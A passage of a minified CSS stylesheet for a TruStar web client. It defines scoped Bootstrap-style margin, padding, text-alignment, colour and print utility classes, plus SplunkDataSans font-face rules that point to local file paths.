.py-sm-1{padding-top:.25rem !important}.trustar .pr-sm-1,.trustar .px-sm-1{padding-right:.25rem !important}.trustar .pb-sm-1,.trustar .py-sm-1{padding-bottom:.25rem !important}.trustar .pl-sm-1,.trustar .px-sm-1{padding-left:.25rem !important}.trustar .p-sm-2{padding:.5rem !important}.trustar .pt-sm-2,.trustar .py-sm-2{padding-top:.5rem !important}.trustar .pr-sm-2,.trustar .px-sm-2{padding-right:.5rem !important}.trustar .pb-sm-2,.trustar .py-sm-2{padding-bottom:.5rem !important}.trustar .pl-sm-2,.trustar .px-sm-2{padding-left:.5rem !important}.trustar .p-sm-3{padding:1rem !important}.trustar .pt-sm-3,.trustar .py-sm-3{padding-top:1rem !important}.trustar .pr-sm-3,.trustar .px-sm-3{padding-right:1rem !important}.trustar .pb-sm-3,.trustar .py-sm-3{padding-bottom:1rem !important}.trustar .pl-sm-3,.trustar .px-sm-3{padding-left:1rem !important}.trustar .p-sm-4{padding:1.5rem !important}.trustar .pt-sm-4,.trustar .py-sm-4{padding-top:1.5rem !important}.trustar .pr-sm-4,.trustar .px-sm-4{padding-right:1.5rem !important}.trustar .pb-sm-4,.trustar .py-sm-4{padding-bottom:1.5rem !important}.trustar .pl-sm-4,.trustar .px-sm-4{padding-left:1.5rem !important}.trustar .p-sm-5{padding:3rem !important}.trustar .pt-sm-5,.trustar .py-sm-5{padding-top:3rem !important}.trustar .pr-sm-5,.trustar .px-sm-5{padding-right:3rem !important}.trustar .pb-sm-5,.trustar .py-sm-5{padding-bottom:3rem !important}.trustar .pl-sm-5,.trustar .px-sm-5{padding-left:3rem !important}.trustar .m-sm-n1{margin:-.25rem !important}.trustar .mt-sm-n1,.trustar .my-sm-n1{margin-top:-.25rem !important}.trustar .mr-sm-n1,.trustar .mx-sm-n1{margin-right:-.25rem !important}.trustar .mb-sm-n1,.trustar .my-sm-n1{margin-bottom:-.25rem !important}.trustar .ml-sm-n1,.trustar .mx-sm-n1{margin-left:-.25rem !important}.trustar .m-sm-n2{margin:-.5rem !important}.trustar .mt-sm-n2,.trustar .my-sm-n2{margin-top:-.5rem !important}.trustar .mr-sm-n2,.trustar .mx-sm-n2{margin-right:-.5rem !important}.trustar .mb-sm-n2,.trustar .my-sm-n2{margin-bottom:-.5rem !important}.trustar .ml-sm-n2,.trustar .mx-sm-n2{margin-left:-.5rem !important}.trustar .m-sm-n3{margin:-1rem !important}.trustar .mt-sm-n3,.trustar .my-sm-n3{margin-top:-1rem !important}.trustar .mr-sm-n3,.trustar .mx-sm-n3{margin-right:-1rem !important}.trustar .mb-sm-n3,.trustar .my-sm-n3{margin-bottom:-1rem !important}.trustar .ml-sm-n3,.trustar .mx-sm-n3{margin-left:-1rem !important}.trustar .m-sm-n4{margin:-1.5rem !important}.trustar .mt-sm-n4,.trustar .my-sm-n4{margin-top:-1.5rem !important}.trustar .mr-sm-n4,.trustar .mx-sm-n4{margin-right:-1.5rem !important}.trustar .mb-sm-n4,.trustar .my-sm-n4{margin-bottom:-1.5rem !important}.trustar .ml-sm-n4,.trustar .mx-sm-n4{margin-left:-1.5rem !important}.trustar .m-sm-n5{margin:-3rem !important}.trustar .mt-sm-n5,.trustar .my-sm-n5{margin-top:-3rem !important}.trustar .mr-sm-n5,.trustar .mx-sm-n5{margin-right:-3rem !important}.trustar .mb-sm-n5,.trustar .my-sm-n5{margin-bottom:-3rem !important}.trustar .ml-sm-n5,.trustar .mx-sm-n5{margin-left:-3rem !important}.trustar .m-sm-auto{margin:auto !important}.trustar .mt-sm-auto,.trustar .my-sm-auto{margin-top:auto !important}.trustar .mr-sm-auto,.trustar .mx-sm-auto{margin-right:auto !important}.trustar .mb-sm-auto,.trustar .my-sm-auto{margin-bottom:auto !important}.trustar .ml-sm-auto,.trustar .mx-sm-auto{margin-left:auto !important}}@media (min-width: 768px){.trustar .m-md-0{margin:0 !important}.trustar .mt-md-0,.trustar .my-md-0{margin-top:0 !important}.trustar .mr-md-0,.trustar .mx-md-0{margin-right:0 !important}.trustar .mb-md-0,.trustar .my-md-0{margin-bottom:0 !important}.trustar .ml-md-0,.trustar .mx-md-0{margin-left:0 !important}.trustar .m-md-1{margin:.25rem !important}.trustar .mt-md-1,.trustar .my-md-1{margin-top:.25rem !important}.trustar .mr-md-1,.trustar .mx-md-1{margin-right:.25rem !important}.trustar .mb-md-1,.trustar .my-md-1{margin-bottom:.25rem !important}.trustar .ml-md-1,.trustar .mx-md-1{margin-left:.25rem !important}.trustar .m-md-2{margin:.5rem !important}.trustar .mt-md-2,.trustar .my-md-2{margin-top:.5rem !important}.trustar .mr-md-2,.trustar .mx-md-2{margin-right:.5rem !important}.trustar .mb-md-2,.trustar .my-md-2{margin-bottom:.5rem !important}.trustar .ml-md-2,.trustar .mx-md-2{margin-left:.5rem !important}.trustar .m-md-3{margin:1rem !important}.trustar .mt-md-3,.trustar .my-md-3{margin-top:1rem !important}.trustar .mr-md-3,.trustar .mx-md-3{margin-right:1rem !important}.trustar .mb-md-3,.trustar .my-md-3{margin-bottom:1rem !important}.trustar .ml-md-3,.trustar .mx-md-3{margin-left:1rem !important}.trustar .m-md-4{margin:1.5rem !important}.trustar .mt-md-4,.trustar .my-md-4{margin-top:1.5rem !important}.trustar .mr-md-4,.trustar .mx-md-4{margin-right:1.5rem !important}.trustar .mb-md-4,.trustar .my-md-4{margin-bottom:1.5rem !important}.trustar .ml-md-4,.trustar .mx-md-4{margin-left:1.5rem !important}.trustar .m-md-5{margin:3rem !important}.trustar .mt-md-5,.trustar .my-md-5{margin-top:3rem !important}.trustar .mr-md-5,.trustar .mx-md-5{margin-right:3rem !important}.trustar .mb-md-5,.trustar .my-md-5{margin-bottom:3rem !important}.trustar .ml-md-5,.trustar .mx-md-5{margin-left:3rem !important}.trustar .p-md-0{padding:0 !important}.trustar .pt-md-0,.trustar .py-md-0{padding-top:0 !important}.trustar .pr-md-0,.trustar .px-md-0{padding-right:0 !important}.trustar .pb-md-0,.trustar .py-md-0{padding-bottom:0 !important}.trustar .pl-md-0,.trustar .px-md-0{padding-left:0 !important}.trustar .p-md-1{padding:.25rem !important}.trustar .pt-md-1,.trustar .py-md-1{padding-top:.25rem !important}.trustar .pr-md-1,.trustar .px-md-1{padding-right:.25rem !important}.trustar .pb-md-1,.trustar .py-md-1{padding-bottom:.25rem !important}.trustar .pl-md-1,.trustar .px-md-1{padding-left:.25rem !important}.trustar .p-md-2{padding:.5rem !important}.trustar .pt-md-2,.trustar .py-md-2{padding-top:.5rem !important}.trustar .pr-md-2,.trustar .px-md-2{padding-right:.5rem !important}.trustar .pb-md-2,.trustar .py-md-2{padding-bottom:.5rem !important}.trustar .pl-md-2,.trustar .px-md-2{padding-left:.5rem !important}.trustar .p-md-3{padding:1rem !important}.trustar .pt-md-3,.trustar .py-md-3{padding-top:1rem !important}.trustar .pr-md-3,.trustar .px-md-3{padding-right:1rem !important}.trustar .pb-md-3,.trustar .py-md-3{padding-bottom:1rem !important}.trustar .pl-md-3,.trustar .px-md-3{padding-left:1rem !important}.trustar .p-md-4{padding:1.5rem !important}.trustar .pt-md-4,.trustar .py-md-4{padding-top:1.5rem !important}.trustar .pr-md-4,.trustar .px-md-4{padding-right:1.5rem !important}.trustar .pb-md-4,.trustar .py-md-4{padding-bottom:1.5rem !important}.trustar .pl-md-4,.trustar .px-md-4{padding-left:1.5rem !important}.trustar .p-md-5{padding:3rem !important}.trustar .pt-md-5,.trustar .py-md-5{padding-top:3rem !important}.trustar .pr-md-5,.trustar .px-md-5{padding-right:3rem !important}.trustar .pb-md-5,.trustar .py-md-5{padding-bottom:3rem !important}.trustar .pl-md-5,.trustar .px-md-5{padding-left:3rem !important}.trustar .m-md-n1{margin:-.25rem !important}.trustar .mt-md-n1,.trustar .my-md-n1{margin-top:-.25rem !important}.trustar .mr-md-n1,.trustar .mx-md-n1{margin-right:-.25rem !important}.trustar .mb-md-n1,.trustar .my-md-n1{margin-bottom:-.25rem !important}.trustar .ml-md-n1,.trustar .mx-md-n1{margin-left:-.25rem !important}.trustar .m-md-n2{margin:-.5rem !important}.trustar .mt-md-n2,.trustar .my-md-n2{margin-top:-.5rem !important}.trustar .mr-md-n2,.trustar .mx-md-n2{margin-right:-.5rem !important}.trustar .mb-md-n2,.trustar .my-md-n2{margin-bottom:-.5rem !important}.trustar .ml-md-n2,.trustar .mx-md-n2{margin-left:-.5rem !important}.trustar .m-md-n3{margin:-1rem !important}.trustar .mt-md-n3,.trustar .my-md-n3{margin-top:-1rem !important}.trustar .mr-md-n3,.trustar .mx-md-n3{margin-right:-1rem !important}.trustar .mb-md-n3,.trustar .my-md-n3{margin-bottom:-1rem !important}.trustar .ml-md-n3,.trustar .mx-md-n3{margin-left:-1rem !important}.trustar .m-md-n4{margin:-1.5rem !important}.trustar .mt-md-n4,.trustar .my-md-n4{margin-top:-1.5rem !important}.trustar .mr-md-n4,.trustar .mx-md-n4{margin-right:-1.5rem !important}.trustar .mb-md-n4,.trustar .my-md-n4{margin-bottom:-1.5rem !important}.trustar .ml-md-n4,.trustar .mx-md-n4{margin-left:-1.5rem !important}.trustar .m-md-n5{margin:-3rem !important}.trustar .mt-md-n5,.trustar .my-md-n5{margin-top:-3rem !important}.trustar .mr-md-n5,.trustar .mx-md-n5{margin-right:-3rem !important}.trustar .mb-md-n5,.trustar .my-md-n5{margin-bottom:-3rem !important}.trustar .ml-md-n5,.trustar .mx-md-n5{margin-left:-3rem !important}.trustar .m-md-auto{margin:auto !important}.trustar .mt-md-auto,.trustar .my-md-auto{margin-top:auto !important}.trustar .mr-md-auto,.trustar .mx-md-auto{margin-right:auto !important}.trustar .mb-md-auto,.trustar .my-md-auto{margin-bottom:auto !important}.trustar .ml-md-auto,.trustar .mx-md-auto{margin-left:auto !important}}@media (min-width: 992px){.trustar .m-lg-0{margin:0 !important}.trustar .mt-lg-0,.trustar .my-lg-0{margin-top:0 !important}.trustar .mr-lg-0,.trustar .mx-lg-0{margin-right:0 !important}.trustar .mb-lg-0,.trustar .my-lg-0{margin-bottom:0 !important}.trustar .ml-lg-0,.trustar .mx-lg-0{margin-left:0 !important}.trustar .m-lg-1{margin:.25rem !important}.trustar .mt-lg-1,.trustar .my-lg-1{margin-top:.25rem !important}.trustar .mr-lg-1,.trustar .mx-lg-1{margin-right:.25rem !important}.trustar .mb-lg-1,.trustar .my-lg-1{margin-bottom:.25rem !important}.trustar .ml-lg-1,.trustar .mx-lg-1{margin-left:.25rem !important}.trustar .m-lg-2{margin:.5rem !important}.trustar .mt-lg-2,.trustar .my-lg-2{margin-top:.5rem !important}.trustar .mr-lg-2,.trustar .mx-lg-2{margin-right:.5rem !important}.trustar .mb-lg-2,.trustar .my-lg-2{margin-bottom:.5rem !important}.trustar .ml-lg-2,.trustar .mx-lg-2{margin-left:.5rem !important}.trustar .m-lg-3{margin:1rem !important}.trustar .mt-lg-3,.trustar .my-lg-3{margin-top:1rem !important}.trustar .mr-lg-3,.trustar .mx-lg-3{margin-right:1rem !important}.trustar .mb-lg-3,.trustar .my-lg-3{margin-bottom:1rem !important}.trustar .ml-lg-3,.trustar .mx-lg-3{margin-left:1rem !important}.trustar .m-lg-4{margin:1.5rem !important}.trustar .mt-lg-4,.trustar .my-lg-4{margin-top:1.5rem !important}.trustar .mr-lg-4,.trustar .mx-lg-4{margin-right:1.5rem !important}.trustar .mb-lg-4,.trustar .my-lg-4{margin-bottom:1.5rem !important}.trustar .ml-lg-4,.trustar .mx-lg-4{margin-left:1.5rem !important}.trustar .m-lg-5{margin:3rem !important}.trustar .mt-lg-5,.trustar .my-lg-5{margin-top:3rem !important}.trustar .mr-lg-5,.trustar .mx-lg-5{margin-right:3rem !important}.trustar .mb-lg-5,.trustar .my-lg-5{margin-bottom:3rem !important}.trustar .ml-lg-5,.trustar .mx-lg-5{margin-left:3rem !important}.trustar .p-lg-0{padding:0 !important}.trustar .pt-lg-0,.trustar .py-lg-0{padding-top:0 !important}.trustar .pr-lg-0,.trustar .px-lg-0{padding-right:0 !important}.trustar .pb-lg-0,.trustar .py-lg-0{padding-bottom:0 !important}.trustar .pl-lg-0,.trustar .px-lg-0{padding-left:0 !important}.trustar .p-lg-1{padding:.25rem !important}.trustar .pt-lg-1,.trustar .py-lg-1{padding-top:.25rem !important}.trustar .pr-lg-1,.trustar .px-lg-1{padding-right:.25rem !important}.trustar .pb-lg-1,.trustar .py-lg-1{padding-bottom:.25rem !important}.trustar .pl-lg-1,.trustar .px-lg-1{padding-left:.25rem !important}.trustar .p-lg-2{padding:.5rem !important}.trustar .pt-lg-2,.trustar .py-lg-2{padding-top:.5rem !important}.trustar .pr-lg-2,.trustar .px-lg-2{padding-right:.5rem !important}.trustar .pb-lg-2,.trustar .py-lg-2{padding-bottom:.5rem !important}.trustar .pl-lg-2,.trustar .px-lg-2{padding-left:.5rem !important}.trustar .p-lg-3{padding:1rem !important}.trustar .pt-lg-3,.trustar .py-lg-3{padding-top:1rem !important}.trustar .pr-lg-3,.trustar .px-lg-3{padding-right:1rem !important}.trustar .pb-lg-3,.trustar .py-lg-3{padding-bottom:1rem !important}.trustar .pl-lg-3,.trustar .px-lg-3{padding-left:1rem !important}.trustar .p-lg-4{padding:1.5rem !important}.trustar .pt-lg-4,.trustar .py-lg-4{padding-top:1.5rem !important}.trustar .pr-lg-4,.trustar .px-lg-4{padding-right:1.5rem !important}.trustar .pb-lg-4,.trustar .py-lg-4{padding-bottom:1.5rem !important}.trustar .pl-lg-4,.trustar .px-lg-4{padding-left:1.5rem !important}.trustar .p-lg-5{padding:3rem !important}.trustar .pt-lg-5,.trustar .py-lg-5{padding-top:3rem !important}.trustar .pr-lg-5,.trustar .px-lg-5{padding-right:3rem !important}.trustar .pb-lg-5,.trustar .py-lg-5{padding-bottom:3rem !important}.trustar .pl-lg-5,.trustar .px-lg-5{padding-left:3rem !important}.trustar .m-lg-n1{margin:-.25rem !important}.trustar .mt-lg-n1,.trustar .my-lg-n1{margin-top:-.25rem !important}.trustar .mr-lg-n1,.trustar .mx-lg-n1{margin-right:-.25rem !important}.trustar .mb-lg-n1,.trustar .my-lg-n1{margin-bottom:-.25rem !important}.trustar .ml-lg-n1,.trustar .mx-lg-n1{margin-left:-.25rem !important}.trustar .m-lg-n2{margin:-.5rem !important}.trustar .mt-lg-n2,.trustar .my-lg-n2{margin-top:-.5rem !important}.trustar .mr-lg-n2,.trustar .mx-lg-n2{margin-right:-.5rem !important}.trustar .mb-lg-n2,.trustar .my-lg-n2{margin-bottom:-.5rem !important}.trustar .ml-lg-n2,.trustar .mx-lg-n2{margin-left:-.5rem !important}.trustar .m-lg-n3{margin:-1rem !important}.trustar .mt-lg-n3,.trustar .my-lg-n3{margin-top:-1rem !important}.trustar .mr-lg-n3,.trustar .mx-lg-n3{margin-right:-1rem !important}.trustar .mb-lg-n3,.trustar .my-lg-n3{margin-bottom:-1rem !important}.trustar .ml-lg-n3,.trustar .mx-lg-n3{margin-left:-1rem !important}.trustar .m-lg-n4{margin:-1.5rem !important}.trustar .mt-lg-n4,.trustar .my-lg-n4{margin-top:-1.5rem !important}.trustar .mr-lg-n4,.trustar .mx-lg-n4{margin-right:-1.5rem !important}.trustar .mb-lg-n4,.trustar .my-lg-n4{margin-bottom:-1.5rem !important}.trustar .ml-lg-n4,.trustar .mx-lg-n4{margin-left:-1.5rem !important}.trustar .m-lg-n5{margin:-3rem !important}.trustar .mt-lg-n5,.trustar .my-lg-n5{margin-top:-3rem !important}.trustar .mr-lg-n5,.trustar .mx-lg-n5{margin-right:-3rem !important}.trustar .mb-lg-n5,.trustar .my-lg-n5{margin-bottom:-3rem !important}.trustar .ml-lg-n5,.trustar .mx-lg-n5{margin-left:-3rem !important}.trustar .m-lg-auto{margin:auto !important}.trustar .mt-lg-auto,.trustar .my-lg-auto{margin-top:auto !important}.trustar .mr-lg-auto,.trustar .mx-lg-auto{margin-right:auto !important}.trustar .mb-lg-auto,.trustar .my-lg-auto{margin-bottom:auto !important}.trustar .ml-lg-auto,.trustar .mx-lg-auto{margin-left:auto !important}}@media (min-width: 1200px){.trustar .m-xl-0{margin:0 !important}.trustar .mt-xl-0,.trustar .my-xl-0{margin-top:0 !important}.trustar .mr-xl-0,.trustar .mx-xl-0{margin-right:0 !important}.trustar .mb-xl-0,.trustar .my-xl-0{margin-bottom:0 !important}.trustar .ml-xl-0,.trustar .mx-xl-0{margin-left:0 !important}.trustar .m-xl-1{margin:.25rem !important}.trustar .mt-xl-1,.trustar .my-xl-1{margin-top:.25rem !important}.trustar .mr-xl-1,.trustar .mx-xl-1{margin-right:.25rem !important}.trustar .mb-xl-1,.trustar .my-xl-1{margin-bottom:.25rem !important}.trustar .ml-xl-1,.trustar .mx-xl-1{margin-left:.25rem !important}.trustar .m-xl-2{margin:.5rem !important}.trustar .mt-xl-2,.trustar .my-xl-2{margin-top:.5rem !important}.trustar .mr-xl-2,.trustar .mx-xl-2{margin-right:.5rem !important}.trustar .mb-xl-2,.trustar .my-xl-2{margin-bottom:.5rem !important}.trustar .ml-xl-2,.trustar .mx-xl-2{margin-left:.5rem !important}.trustar .m-xl-3{margin:1rem !important}.trustar .mt-xl-3,.trustar .my-xl-3{margin-top:1rem !important}.trustar .mr-xl-3,.trustar .mx-xl-3{margin-right:1rem !important}.trustar .mb-xl-3,.trustar .my-xl-3{margin-bottom:1rem !important}.trustar .ml-xl-3,.trustar .mx-xl-3{margin-left:1rem !important}.trustar .m-xl-4{margin:1.5rem !important}.trustar .mt-xl-4,.trustar .my-xl-4{margin-top:1.5rem !important}.trustar .mr-xl-4,.trustar .mx-xl-4{margin-right:1.5rem !important}.trustar .mb-xl-4,.trustar .my-xl-4{margin-bottom:1.5rem !important}.trustar .ml-xl-4,.trustar .mx-xl-4{margin-left:1.5rem !important}.trustar .m-xl-5{margin:3rem !important}.trustar .mt-xl-5,.trustar .my-xl-5{margin-top:3rem !important}.trustar .mr-xl-5,.trustar .mx-xl-5{margin-right:3rem !important}.trustar .mb-xl-5,.trustar .my-xl-5{margin-bottom:3rem !important}.trustar .ml-xl-5,.trustar .mx-xl-5{margin-left:3rem !important}.trustar .p-xl-0{padding:0 !important}.trustar .pt-xl-0,.trustar .py-xl-0{padding-top:0 !important}.trustar .pr-xl-0,.trustar .px-xl-0{padding-right:0 !important}.trustar .pb-xl-0,.trustar .py-xl-0{padding-bottom:0 !important}.trustar .pl-xl-0,.trustar .px-xl-0{padding-left:0 !important}.trustar .p-xl-1{padding:.25rem !important}.trustar .pt-xl-1,.trustar .py-xl-1{padding-top:.25rem !important}.trustar .pr-xl-1,.trustar .px-xl-1{padding-right:.25rem !important}.trustar .pb-xl-1,.trustar .py-xl-1{padding-bottom:.25rem !important}.trustar .pl-xl-1,.trustar .px-xl-1{padding-left:.25rem !important}.trustar .p-xl-2{padding:.5rem !important}.trustar .pt-xl-2,.trustar .py-xl-2{padding-top:.5rem !important}.trustar .pr-xl-2,.trustar .px-xl-2{padding-right:.5rem !important}.trustar .pb-xl-2,.trustar .py-xl-2{padding-bottom:.5rem !important}.trustar .pl-xl-2,.trustar .px-xl-2{padding-left:.5rem !important}.trustar .p-xl-3{padding:1rem !important}.trustar .pt-xl-3,.trustar .py-xl-3{padding-top:1rem !important}.trustar .pr-xl-3,.trustar .px-xl-3{padding-right:1rem !important}.trustar .pb-xl-3,.trustar .py-xl-3{padding-bottom:1rem !important}.trustar .pl-xl-3,.trustar .px-xl-3{padding-left:1rem !important}.trustar .p-xl-4{padding:1.5rem !important}.trustar .pt-xl-4,.trustar .py-xl-4{padding-top:1.5rem !important}.trustar .pr-xl-4,.trustar .px-xl-4{padding-right:1.5rem !important}.trustar .pb-xl-4,.trustar .py-xl-4{padding-bottom:1.5rem !important}.trustar .pl-xl-4,.trustar .px-xl-4{padding-left:1.5rem !important}.trustar .p-xl-5{padding:3rem !important}.trustar .pt-xl-5,.trustar .py-xl-5{padding-top:3rem !important}.trustar .pr-xl-5,.trustar .px-xl-5{padding-right:3rem !important}.trustar .pb-xl-5,.trustar .py-xl-5{padding-bottom:3rem !important}.trustar .pl-xl-5,.trustar .px-xl-5{padding-left:3rem !important}.trustar .m-xl-n1{margin:-.25rem !important}.trustar .mt-xl-n1,.trustar .my-xl-n1{margin-top:-.25rem !important}.trustar .mr-xl-n1,.trustar .mx-xl-n1{margin-right:-.25rem !important}.trustar .mb-xl-n1,.trustar .my-xl-n1{margin-bottom:-.25rem !important}.trustar .ml-xl-n1,.trustar .mx-xl-n1{margin-left:-.25rem !important}.trustar .m-xl-n2{margin:-.5rem !important}.trustar .mt-xl-n2,.trustar .my-xl-n2{margin-top:-.5rem !important}.trustar .mr-xl-n2,.trustar .mx-xl-n2{margin-right:-.5rem !important}.trustar .mb-xl-n2,.trustar .my-xl-n2{margin-bottom:-.5rem !important}.trustar .ml-xl-n2,.trustar .mx-xl-n2{margin-left:-.5rem !important}.trustar .m-xl-n3{margin:-1rem !important}.trustar .mt-xl-n3,.trustar .my-xl-n3{margin-top:-1rem !important}.trustar .mr-xl-n3,.trustar .mx-xl-n3{margin-right:-1rem !important}.trustar .mb-xl-n3,.trustar .my-xl-n3{margin-bottom:-1rem !important}.trustar .ml-xl-n3,.trustar .mx-xl-n3{margin-left:-1rem !important}.trustar .m-xl-n4{margin:-1.5rem !important}.trustar .mt-xl-n4,.trustar .my-xl-n4{margin-top:-1.5rem !important}.trustar .mr-xl-n4,.trustar .mx-xl-n4{margin-right:-1.5rem !important}.trustar .mb-xl-n4,.trustar .my-xl-n4{margin-bottom:-1.5rem !important}.trustar .ml-xl-n4,.trustar .mx-xl-n4{margin-left:-1.5rem !important}.trustar .m-xl-n5{margin:-3rem !important}.trustar .mt-xl-n5,.trustar .my-xl-n5{margin-top:-3rem !important}.trustar .mr-xl-n5,.trustar .mx-xl-n5{margin-right:-3rem !important}.trustar .mb-xl-n5,.trustar .my-xl-n5{margin-bottom:-3rem !important}.trustar .ml-xl-n5,.trustar .mx-xl-n5{margin-left:-3rem !important}.trustar .m-xl-auto{margin:auto !important}.trustar .mt-xl-auto,.trustar .my-xl-auto{margin-top:auto !important}.trustar .mr-xl-auto,.trustar .mx-xl-auto{margin-right:auto !important}.trustar .mb-xl-auto,.trustar .my-xl-auto{margin-bottom:auto !important}.trustar .ml-xl-auto,.trustar .mx-xl-auto{margin-left:auto !important}}.trustar .text-monospace{font-family:SFMono-Regular,Menlo,Monaco,Consolas,\"Liberation Mono\",\"Courier New\",monospace}.trustar .text-justify{text-align:justify !important}.trustar .text-wrap{white-space:normal !important}.trustar .text-nowrap{white-space:nowrap !important}.trustar .text-truncate{overflow:hidden;text-overflow:ellipsis;white-space:nowrap}.trustar .text-left{text-align:left !important}.trustar .text-right{text-align:right !important}.trustar .text-center{text-align:center !important}@media (min-width: 576px){.trustar .text-sm-left{text-align:left !important}.trustar .text-sm-right{text-align:right !important}.trustar .text-sm-center{text-align:center !important}}@media (min-width: 768px){.trustar .text-md-left{text-align:left !important}.trustar .text-md-right{text-align:right !important}.trustar .text-md-center{text-align:center !important}}@media (min-width: 992px){.trustar .text-lg-left{text-align:left !important}.trustar .text-lg-right{text-align:right !important}.trustar .text-lg-center{text-align:center !important}}@media (min-width: 1200px){.trustar .text-xl-left{text-align:left !important}.trustar .text-xl-right{text-align:right !important}.trustar .text-xl-center{text-align:center !important}}.trustar .text-lowercase{text-transform:lowercase !important}.trustar .text-uppercase{text-transform:uppercase !important}.trustar .text-capitalize{text-transform:capitalize !important}.trustar .font-weight-light{font-weight:300 !important}.trustar .font-weight-lighter{font-weight:lighter !important}.trustar .font-weight-normal{font-weight:400 !important}.trustar .font-weight-bold{font-weight:700 !important}.trustar .font-weight-bolder{font-weight:bolder !important}.trustar .font-italic{font-style:italic !important}.trustar .text-white{color:#fff !important}.trustar .text-primary{color:#3568d5 !important}.trustar a.text-primary:hover,.trustar a.text-primary:focus{color:#21489d !important}.trustar .text-secondary{color:#ff9a6f !important}.trustar a.text-secondary:hover,.trustar a.text-secondary:focus{color:#ff6423 !important}.trustar .text-success{color:#28a745 !important}.trustar a.text-success:hover,.trustar a.text-success:focus{color:#19692c !important}.trustar .text-info{color:#17a2b8 !important}.trustar a.text-info:hover,.trustar a.text-info:focus{color:#0f6674 !important}.trustar .text-warning{color:#ffc107 !important}.trustar a.text-warning:hover,.trustar a.text-warning:focus{color:#ba8b00 !important}.trustar .text-danger{color:#dc3545 !important}.trustar a.text-danger:hover,.trustar a.text-danger:focus{color:#a71d2a !important}.trustar .text-light{color:#eaecf1 !important}.trustar a.text-light:hover,.trustar a.text-light:focus{color:#bcc2d2 !important}.trustar .text-dark{color:#44546a !important}.trustar a.text-dark:hover,.trustar a.text-dark:focus{color:#262f3b !important}.trustar .text-brand-primary{color:#3568d5 !important}.trustar a.text-brand-primary:hover,.trustar a.text-brand-primary:focus{color:#21489d !important}.trustar .text-brand-secondary{color:#ff9a6f !important}.trustar a.text-brand-secondary:hover,.trustar a.text-brand-secondary:focus{color:#ff6423 !important}.trustar .text-functional-success{color:#417505 !important}.trustar a.text-functional-success:hover,.trustar a.text-functional-success:focus{color:#182c02 !important}.trustar .text-functional-info{color:#4a90e2 !important}.trustar a.text-functional-info:hover,.trustar a.text-functional-info:focus{color:#1f69c1 !important}.trustar .text-functional-warning{color:#f5a623 !important}.trustar a.text-functional-warning:hover,.trustar a.text-functional-warning:focus{color:#c37d09 !important}.trustar .text-functional-danger{color:#d0021b !important}.trustar a.text-functional-danger:hover,.trustar a.text-functional-danger:focus{color:#840111 !important}.trustar .text-functional-accept{color:#fff !important}.trustar a.text-functional-accept:hover,.trustar a.text-functional-accept:focus{color:#d9d9d9 !important}.trustar .text-functional-decline{color:#fff !important}.trustar a.text-functional-decline:hover,.trustar a.text-functional-decline:focus{color:#d9d9d9 !important}.trustar .text-operational-critical{color:#fff !important}.trustar a.text-operational-critical:hover,.trustar a.text-operational-critical:focus{color:#d9d9d9 !important}.trustar .text-operational-error{color:#fff !important}.trustar a.text-operational-error:hover,.trustar a.text-operational-error:focus{color:#d9d9d9 !important}.trustar .text-operational-warning{color:#fff !important}.trustar a.text-operational-warning:hover,.trustar a.text-operational-warning:focus{color:#d9d9d9 !important}.trustar .text-operational-info{color:#fff !important}.trustar a.text-operational-info:hover,.trustar a.text-operational-info:focus{color:#d9d9d9 !important}.trustar .text-body{color:#212529 !important}.trustar .text-muted{color:#6c757d !important}.trustar .text-black-50{color:rgba(0,0,0,0.5) !important}.trustar .text-white-50{color:rgba(255,255,255,0.5) !important}.trustar .text-hide{font:0/0 a;color:transparent;text-shadow:none;background-color:transparent;border:0}.trustar .text-decoration-none{text-decoration:none !important}.trustar .text-reset{color:inherit !important}.trustar .visible{visibility:visible !important}.trustar .invisible{visibility:hidden !important}@media print{.trustar *,.trustar *::before,.trustar *::after{text-shadow:none !important;box-shadow:none !important}.trustar a:not(.btn){text-decoration:underline}.trustar abbr[title]::after{content:\" (\" attr(title) \")\"}.trustar pre{white-space:pre-wrap !important}.trustar pre,.trustar blockquote{border:1px solid #adb5bd;page-break-inside:avoid}.trustar thead{display:table-header-group}.trustar tr,.trustar img{page-break-inside:avoid}.trustar p,.trustar h2,.trustar h3{orphans:3;widows:3}.trustar h2,.trustar h3{page-break-after:avoid}@page{.trustar{size:a3}}.trustar body{min-width:992px !important}.trustar .container{min-width:992px !important}.trustar .navbar{display:none}.trustar .badge{border:1px solid #000}.trustar .table{border-collapse:collapse !important}.trustar .table td,.trustar .table th{background-color:#fff !important}.trustar .table-bordered th,.trustar .table-bordered td{border:1px solid #dee2e6 !important}.trustar .table-dark{color:inherit}.trustar .table-dark th,.trustar .table-dark td,.trustar .table-dark thead th,.trustar .table-dark tbody+tbody{border-color:#dee2e6}.trustar .table .thead-dark th{color:inherit;border-color:#dee2e6}}.trustar .no-user-select{-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none}.trustar button:focus,.trustar a:focus{outline:0}.trustar a,.trustar a:hover{text-decoration:none;color:white}.trustar h1,.trustar .h1{font-size:2rem;margin:.667rem 0rem}.trustar h2,.trustar .h2{font-size:1.5rem;margin:.667rem 0rem}.trustar h3,.trustar .h3{font-size:1.167rem;margin:0rem}.trustar h4,.trustar .h4{font-size:1rem;margin:0rem}.trustar h5,.trustar .h5{font-size:.833rem;margin:0rem}.trustar h6,.trustar .h6{font-size:.667rem;margin:0rem}.trustar .dropdown-item{color:#000;color:initial}.trustar .dropdown-menu{background-color:transparent;background-color:initial}.trustar button{margin:0;margin:initial;font-size:medium;font-size:initial;line-height:normal;line-height:initial}.trustar button:focus{outline:none}.trustar button:focus,.trustar a:focus{outline:0}.trustar a,.trustar a:hover{text-decoration:none}@font-face{font-family:'SplunkDataSans';src:url(\"/Users/om/Documents/code/trustar-platform/modules/station-web-client/web_modules/trustar-2.0/themes/common/assets/fonts/SplunkDataSans-regular.woff2\") format(\"woff2\");font-weight:400;font-style:normal}@font-face{font-family:'SplunkDataSans';src:url(\"/Users/om/Documents/code/trustar-platform/modules/station-web-client/web_modules/trustar-2.0/themes/common/assets/fonts/SplunkDataSans-medium.woff2\") format(\"woff2\");font-weight:500;font-style:normal}@font-face{font-family:'SplunkDataSans';src:url(\"/Users/om/Documents/code/trustar-platform/modules/station-web-client/web_modules/trustar-2.0/themes/common/assets/fonts/SplunkDataSans-medium.woff2\") format(\"woff2\");font-weight:600;font-style:normal}@font-face{font-family:'SplunkDataSans';src:url(\"/Users/om/Documents/code/trustar-platform/modules/station-web-client/web_modules/trustar-2.0/themes/common/assets/fonts/SplunkDataSans-bold.woff2\") 